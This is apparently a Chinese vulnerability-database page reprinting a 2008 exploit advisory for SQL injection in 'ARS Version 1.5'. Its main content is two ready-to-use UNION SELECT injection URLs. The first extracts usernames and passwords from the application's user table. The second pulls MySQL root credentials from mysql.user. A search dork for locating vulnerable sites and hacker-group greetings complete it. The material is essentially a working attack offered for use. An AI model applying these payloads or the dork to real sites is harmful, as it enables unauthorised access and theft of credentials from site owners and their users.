ARS Version 1.5 SQL Injection Vulnerability

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1052706 漏洞类型
发布时间 2008-06-11 更新时间 2008-06-11
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2008060041
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#########################################################
#
#     ARS Version 1.5  SQL Injection Vulnerability
#========================================================
#    Author: Hussin X                                   =
#                                                       =
#    Home :  www.tryag.cc/cc                            =
#                                                       =
#    email:  darkangel_g85[at]Yahoo[DoT]com             =
#            hussin.x[at]hotmail[DoT]com                =
#                                                       =
#=========================================================    
#    DorK :  Powered By ARS Version 1.5
#     
##########################################################

Exploit: 1  

http://victim.com/page/?id=-1+union+select+1,concat_ws(0x3a,username,password),null+from+ars_user--



Exploit: 2  > Root database

http://victim.com/page/?id=-1+union+select+1,concat(user,0x3a,password),null+from+mysql.user--


###########################################################
########################( Greetz )#########################
#                                                         #
#   tryag / DeViL iRaQ / IRAQ DiveR/ mos_chori / FAHD     #
#                                                         #
####################(and All IRAQIs)#######################
###########################################################